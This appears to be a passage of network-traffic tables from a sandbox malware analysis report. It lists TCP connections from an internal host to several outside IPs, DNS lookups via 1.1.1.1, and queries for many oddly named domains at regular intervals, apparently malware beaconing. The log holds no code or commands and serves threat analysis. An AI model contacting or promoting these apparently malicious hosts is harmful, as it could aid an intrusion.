                                                                                  Sep 25, 2024 09:59:29.497584105 CEST80498303.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:29.497831106 CEST4983080192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:59:29.594747066 CEST80498303.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:59:34.503406048 CEST4983180192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:59:34.730941057 CEST804983184.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:34.731168032 CEST4983180192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:59:34.738835096 CEST4983180192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:59:34.966974974 CEST804983184.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:34.967156887 CEST804983184.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:37.268394947 CEST4983280192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:59:37.491766930 CEST804983284.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:37.491906881 CEST4983280192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:59:37.499583960 CEST4983280192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:59:37.722383022 CEST804983284.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:37.722481966 CEST804983284.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:40.033406973 CEST4983380192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:59:40.255845070 CEST804983384.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:40.256037951 CEST4983380192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:59:40.263812065 CEST4983380192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:59:40.263859034 CEST4983380192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:59:40.263911963 CEST4983380192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:59:40.487608910 CEST804983384.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:40.487624884 CEST804983384.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:42.782763958 CEST4983480192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:59:43.009485006 CEST804983484.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:43.009648085 CEST4983480192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:59:43.014811039 CEST4983480192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:59:43.241451025 CEST804983484.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:43.241939068 CEST804983484.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:43.241961002 CEST804983484.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:43.241986036 CEST804983484.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:43.242016077 CEST804983484.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:43.242028952 CEST804983484.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:43.242041111 CEST804983484.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:43.242265940 CEST804983484.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:43.242280006 CEST804983484.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:43.242290974 CEST804983484.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:43.242353916 CEST4983480192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:59:43.242568016 CEST4983480192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:59:43.246181965 CEST4983480192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:59:43.473367929 CEST804983484.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:59:53.264880896 CEST4983580192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:59:53.434907913 CEST804983554.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:59:53.435138941 CEST4983580192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:59:53.443715096 CEST4983580192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:59:53.613730907 CEST804983554.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:59:53.614177942 CEST804983554.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:59:53.614190102 CEST804983554.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:59:53.614469051 CEST4983580192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:59:54.949876070 CEST4983580192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:59:55.967379093 CEST4983680192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:59:56.137295008 CEST804983654.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:59:56.137501955 CEST4983680192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:59:56.145169973 CEST4983680192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:59:56.315192938 CEST804983654.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:59:56.315361977 CEST804983654.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:59:56.315474987 CEST804983654.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:59:56.315766096 CEST4983680192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:59:57.652481079 CEST4983680192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:59:58.669872046 CEST4983780192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:59:58.839178085 CEST804983754.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:59:58.839371920 CEST4983780192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:59:58.847220898 CEST4983780192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:59:58.847239017 CEST4983780192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:59:58.847286940 CEST4983780192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:59:59.016643047 CEST804983754.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:59:59.018191099 CEST804983754.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:59:59.018204927 CEST804983754.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:59:59.018217087 CEST804983754.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:59:59.018393040 CEST4983780192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 10:00:00.354845047 CEST4983780192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 10:00:01.372462034 CEST4983880192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 10:00:01.542368889 CEST804983854.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 10:00:01.542649031 CEST4983880192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 10:00:01.547859907 CEST4983880192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 10:00:01.717878103 CEST804983854.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 10:00:01.718249083 CEST804983854.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 10:00:01.718262911 CEST804983854.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 10:00:01.718517065 CEST4983880192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 10:00:01.720689058 CEST4983880192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 10:00:01.890582085 CEST804983854.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 10:00:06.730690956 CEST4983980192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 10:00:06.960311890 CEST8049839194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 10:00:06.960539103 CEST4983980192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 10:00:06.968235970 CEST4983980192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 10:00:07.197940111 CEST8049839194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 10:00:07.199125051 CEST8049839194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 10:00:07.199225903 CEST8049839194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 10:00:07.199287891 CEST8049839194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 10:00:07.199299097 CEST8049839194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 10:00:07.199446917 CEST4983980192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 10:00:07.199517012 CEST4983980192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 10:00:07.199517012 CEST4983980192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 10:00:08.478010893 CEST4983980192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 10:00:09.495779037 CEST4984080192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 10:00:09.725158930 CEST8049840194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 10:00:09.725358963 CEST4984080192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 10:00:09.733139992 CEST4984080192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 10:00:09.962313890 CEST8049840194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 10:00:09.962564945 CEST8049840194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 10:00:09.962594032 CEST8049840194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 10:00:09.962795973 CEST8049840194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 10:00:09.962843895 CEST4984080192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 10:00:09.962846994 CEST8049840194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 10:00:09.962946892 CEST4984080192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 10:00:09.963063002 CEST4984080192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 10:00:11.243094921 CEST4984080192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 10:00:12.260662079 CEST4984180192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 10:00:12.492124081 CEST8049841194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 10:00:12.492448092 CEST4984180192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 10:00:12.500293970 CEST4984180192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 10:00:12.500317097 CEST4984180192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 10:00:12.500376940 CEST4984180192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 10:00:12.731821060 CEST8049841194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 10:00:12.731945038 CEST8049841194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 10:00:12.731959105 CEST4984180192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 10:00:12.732115984 CEST8049841194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 10:00:12.732136011 CEST4984180192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 10:00:12.733011007 CEST8049841194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 10:00:12.733026028 CEST8049841194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 10:00:12.733040094 CEST8049841194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 10:00:12.733167887 CEST4984180192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 10:00:12.733336926 CEST4984180192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 10:00:12.963537931 CEST8049841194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 10:00:12.963551998 CEST8049841194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 10:00:12.963773012 CEST4984180192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 10:00:14.008035898 CEST4984180192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 10:00:15.025850058 CEST4984280192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 10:00:15.254787922 CEST8049842194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 10:00:15.255038023 CEST4984280192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 10:00:15.260222912 CEST4984280192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 10:00:15.489047050 CEST8049842194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 10:00:15.489531994 CEST8049842194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 10:00:15.489656925 CEST8049842194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 10:00:15.489670992 CEST8049842194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 10:00:15.489682913 CEST8049842194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 10:00:15.489695072 CEST8049842194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 10:00:15.489706039 CEST8049842194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 10:00:15.489717007 CEST8049842194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 10:00:15.489727974 CEST8049842194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 10:00:15.489815950 CEST4984280192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 10:00:15.489829063 CEST8049842194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 10:00:15.489949942 CEST4984280192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 10:00:15.490065098 CEST4984280192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 10:00:15.491988897 CEST4984280192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 10:00:15.721028090 CEST8049842194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 10:00:20.508822918 CEST4984380192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 10:00:20.826987028 CEST804984338.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 10:00:20.827254057 CEST4984380192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 10:00:20.834908009 CEST4984380192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 10:00:21.164926052 CEST804984338.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 10:00:21.165018082 CEST804984338.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 10:00:21.165028095 CEST804984338.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 10:00:21.165137053 CEST4984380192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 10:00:22.349960089 CEST4984380192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 10:00:23.367546082 CEST4984480192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 10:00:23.680315971 CEST804984438.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 10:00:23.680474043 CEST4984480192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 10:00:23.688252926 CEST4984480192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 10:00:24.011805058 CEST804984438.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 10:00:24.011989117 CEST804984438.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 10:00:24.012001038 CEST804984438.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 10:00:24.012140989 CEST4984480192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 10:00:25.194715023 CEST4984480192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 10:00:26.210736036 CEST4984580192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 10:00:26.530191898 CEST804984538.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 10:00:26.530378103 CEST4984580192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 10:00:26.541857958 CEST4984580192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 10:00:26.541893005 CEST4984580192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 10:00:26.541949987 CEST4984580192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 10:00:26.542052984 CEST4984580192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 10:00:26.861078978 CEST804984538.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 10:00:26.861218929 CEST804984538.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 10:00:26.861464977 CEST804984538.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 10:00:26.861742973 CEST804984538.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 10:00:26.863286972 CEST804984538.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 10:00:26.863312006 CEST804984538.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 10:00:26.863413095 CEST4984580192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 10:00:28.051850080 CEST4984580192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 10:00:29.069674015 CEST4984680192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 10:00:29.389370918 CEST804984638.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 10:00:29.389533043 CEST4984680192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 10:00:29.395265102 CEST4984680192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 10:00:29.723376989 CEST804984638.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 10:00:29.723455906 CEST804984638.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 10:00:29.723551989 CEST804984638.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 10:00:29.723794937 CEST4984680192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 10:00:29.725677967 CEST4984680192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 10:00:30.056339025 CEST804984638.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 10:00:34.740081072 CEST4984780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 10:00:34.842129946 CEST80498473.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 10:00:34.842398882 CEST4984780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 10:00:34.850064039 CEST4984780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 10:00:34.952263117 CEST80498473.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 10:00:34.953532934 CEST80498473.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 10:00:34.953818083 CEST4984780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 10:00:36.362446070 CEST4984780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 10:00:36.464338064 CEST80498473.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 10:00:37.380094051 CEST4984880192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 10:00:37.482139111 CEST80498483.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 10:00:37.482362032 CEST4984880192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 10:00:37.491004944 CEST4984880192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 10:00:37.592793941 CEST80498483.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 10:00:37.594391108 CEST80498483.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 10:00:37.594538927 CEST4984880192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 10:00:39.002561092 CEST4984880192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 10:00:39.104501009 CEST80498483.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 10:00:40.021899939 CEST4984980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 10:00:40.123815060 CEST80498493.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 10:00:40.123991966 CEST4984980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 10:00:40.131798983 CEST4984980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 10:00:40.131845951 CEST4984980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 10:00:40.131895065 CEST4984980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 10:00:40.234225988 CEST80498493.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 10:00:40.234247923 CEST80498493.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 10:00:40.234263897 CEST80498493.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 10:00:40.234278917 CEST80498493.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 10:00:40.234293938 CEST80498493.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 10:00:40.234308958 CEST80498493.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 10:00:40.234325886 CEST80498493.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 10:00:40.235958099 CEST80498493.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 10:00:40.236032009 CEST4984980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 10:00:41.642546892 CEST4984980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 10:00:41.744581938 CEST80498493.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 10:00:42.660399914 CEST4985080192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 10:00:42.762469053 CEST80498503.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 10:00:42.762634039 CEST4985080192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 10:00:42.767828941 CEST4985080192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 10:00:42.869884014 CEST80498503.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 10:00:42.872776985 CEST80498503.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 10:00:42.872803926 CEST80498503.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 10:00:42.873084068 CEST4985080192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 10:00:42.874995947 CEST4985080192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 10:00:42.877172947 CEST80498503.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 10:00:42.877321959 CEST4985080192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 10:00:42.976821899 CEST80498503.33.130.190192.168.11.20

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Sep 25, 2024 09:54:23.194823027 CEST5985153192.168.11.201.1.1.1
                                                                                  Sep 25, 2024 09:54:23.672401905 CEST53598511.1.1.1192.168.11.20
                                                                                  Sep 25, 2024 09:54:57.461941004 CEST5093153192.168.11.201.1.1.1
                                                                                  Sep 25, 2024 09:54:57.618359089 CEST53509311.1.1.1192.168.11.20
                                                                                  Sep 25, 2024 09:55:14.060928106 CEST6273853192.168.11.201.1.1.1
                                                                                  Sep 25, 2024 09:55:14.234441996 CEST53627381.1.1.1192.168.11.20
                                                                                  Sep 25, 2024 09:55:27.386183977 CEST5289153192.168.11.201.1.1.1
                                                                                  Sep 25, 2024 09:55:27.557789087 CEST53528911.1.1.1192.168.11.20
                                                                                  Sep 25, 2024 09:55:40.742575884 CEST5247753192.168.11.201.1.1.1
                                                                                  Sep 25, 2024 09:55:40.934349060 CEST53524771.1.1.1192.168.11.20
                                                                                  Sep 25, 2024 09:55:54.098944902 CEST5276653192.168.11.201.1.1.1
                                                                                  Sep 25, 2024 09:55:54.276148081 CEST53527661.1.1.1192.168.11.20
                                                                                  Sep 25, 2024 09:56:08.033654928 CEST5752253192.168.11.201.1.1.1
                                                                                  Sep 25, 2024 09:56:08.289079905 CEST53575221.1.1.1192.168.11.20
                                                                                  Sep 25, 2024 09:56:21.796000957 CEST6388153192.168.11.201.1.1.1
                                                                                  Sep 25, 2024 09:56:22.146852970 CEST53638811.1.1.1192.168.11.20
                                                                                  Sep 25, 2024 09:56:35.949259043 CEST6500353192.168.11.201.1.1.1
                                                                                  Sep 25, 2024 09:56:36.075088024 CEST53650031.1.1.1192.168.11.20
                                                                                  Sep 25, 2024 09:56:50.305401087 CEST5948953192.168.11.201.1.1.1
                                                                                  Sep 25, 2024 09:56:50.749984026 CEST53594891.1.1.1192.168.11.20
                                                                                  Sep 25, 2024 09:57:04.786613941 CEST4970453192.168.11.201.1.1.1
                                                                                  Sep 25, 2024 09:57:05.058903933 CEST53497041.1.1.1192.168.11.20
                                                                                  Sep 25, 2024 09:57:19.190191031 CEST5027053192.168.11.201.1.1.1
                                                                                  Sep 25, 2024 09:57:19.529452085 CEST53502701.1.1.1192.168.11.20
                                                                                  Sep 25, 2024 09:57:32.702591896 CEST6009153192.168.11.201.1.1.1
                                                                                  Sep 25, 2024 09:57:32.815990925 CEST53600911.1.1.1192.168.11.20
                                                                                  Sep 25, 2024 09:57:45.964993000 CEST6531453192.168.11.201.1.1.1
                                                                                  Sep 25, 2024 09:57:46.157201052 CEST53653141.1.1.1192.168.11.20
                                                                                  Sep 25, 2024 09:58:00.758680105 CEST5321753192.168.11.201.1.1.1
                                                                                  Sep 25, 2024 09:58:01.752358913 CEST53532171.1.1.1192.168.11.20
                                                                                  Sep 25, 2024 09:58:15.724066973 CEST6533153192.168.11.201.1.1.1
                                                                                  Sep 25, 2024 09:58:16.110465050 CEST53653311.1.1.1192.168.11.20
                                                                                  Sep 25, 2024 09:58:29.752290010 CEST5830753192.168.11.201.1.1.1
                                                                                  Sep 25, 2024 09:58:29.864520073 CEST53583071.1.1.1192.168.11.20

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Sep 25, 2024 09:54:23.194823027 CEST192.168.11.201.1.1.10x2512Standard query (0)bestpack.eeA (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:54:57.461941004 CEST192.168.11.201.1.1.10x1b4fStandard query (0)www.inastra.onlineA (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:55:14.060928106 CEST192.168.11.201.1.1.10xd48Standard query (0)www.invicta.worldA (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:55:27.386183977 CEST192.168.11.201.1.1.10xe86Standard query (0)www.whats-in-the-box.orgA (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:55:40.742575884 CEST192.168.11.201.1.1.10xf743Standard query (0)www.linkwave.cloudA (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:55:54.098944902 CEST192.168.11.201.1.1.10xcdfcStandard query (0)www.dfmagazine.shopA (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:56:08.033654928 CEST192.168.11.201.1.1.10xfd44Standard query (0)www.ngmr.xyzA (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:56:21.796000957 CEST192.168.11.201.1.1.10xc1e7Standard query (0)www.albero-dveri.onlineA (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:56:35.949259043 CEST192.168.11.201.1.1.10x5943Standard query (0)www.typ67.topA (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:56:50.305401087 CEST192.168.11.201.1.1.10x6e7eStandard query (0)www.greekhause.orgA (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:57:04.786613941 CEST192.168.11.201.1.1.10x70bStandard query (0)www.dorikis.onlineA (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:57:19.190191031 CEST192.168.11.201.1.1.10xce86Standard query (0)www.platinumkitchens.infoA (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:57:32.702591896 CEST192.168.11.201.1.1.10xab8bStandard query (0)www.dhkatp.vipA (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:57:45.964993000 CEST192.168.11.201.1.1.10x93b5Standard query (0)www.tempatmudisini01.clickA (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:58:00.758680105 CEST192.168.11.201.1.1.10x5c5fStandard query (0)www.komart.shopA (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:58:15.724066973 CEST192.168.11.201.1.1.10x623aStandard query (0)www.dxeg.lolA (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:58:29.752290010 CEST192.168.11.201.1.1.10x521cStandard query (0)www.tukaari.shopA (IP address)IN (0x0001)false

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Sep 25, 2024 09:54:23.672401905 CEST1.1.1.1192.168.11.200x2512No error (0)bestpack.ee185.86.211.137A (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:54:57.618359089 CEST1.1.1.1192.168.11.200x1b4fNo error (0)www.inastra.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:55:14.234441996 CEST1.1.1.1192.168.11.200xd48No error (0)www.invicta.world13.248.169.48A (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:55:14.234441996 CEST1.1.1.1192.168.11.200xd48No error (0)www.invicta.world76.223.54.146A (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:55:27.557789087 CEST1.1.1.1192.168.11.200xe86No error (0)www.whats-in-the-box.orgwhats-in-the-box.orgCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 25, 2024 09:55:27.557789087 CEST1.1.1.1192.168.11.200xe86No error (0)whats-in-the-box.org3.33.130.190A (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:55:27.557789087 CEST1.1.1.1192.168.11.200xe86No error (0)whats-in-the-box.org15.197.148.33A (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:55:40.934349060 CEST1.1.1.1192.168.11.200xf743No error (0)www.linkwave.cloudlinkwave.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 25, 2024 09:55:40.934349060 CEST1.1.1.1192.168.11.200xf743No error (0)linkwave.cloud3.33.130.190A (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:55:40.934349060 CEST1.1.1.1192.168.11.200xf743No error (0)linkwave.cloud15.197.148.33A (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:55:54.276148081 CEST1.1.1.1192.168.11.200xcdfcNo error (0)www.dfmagazine.shopdfmagazine.shopCNAME (Canonical name)IN (0x0001)false
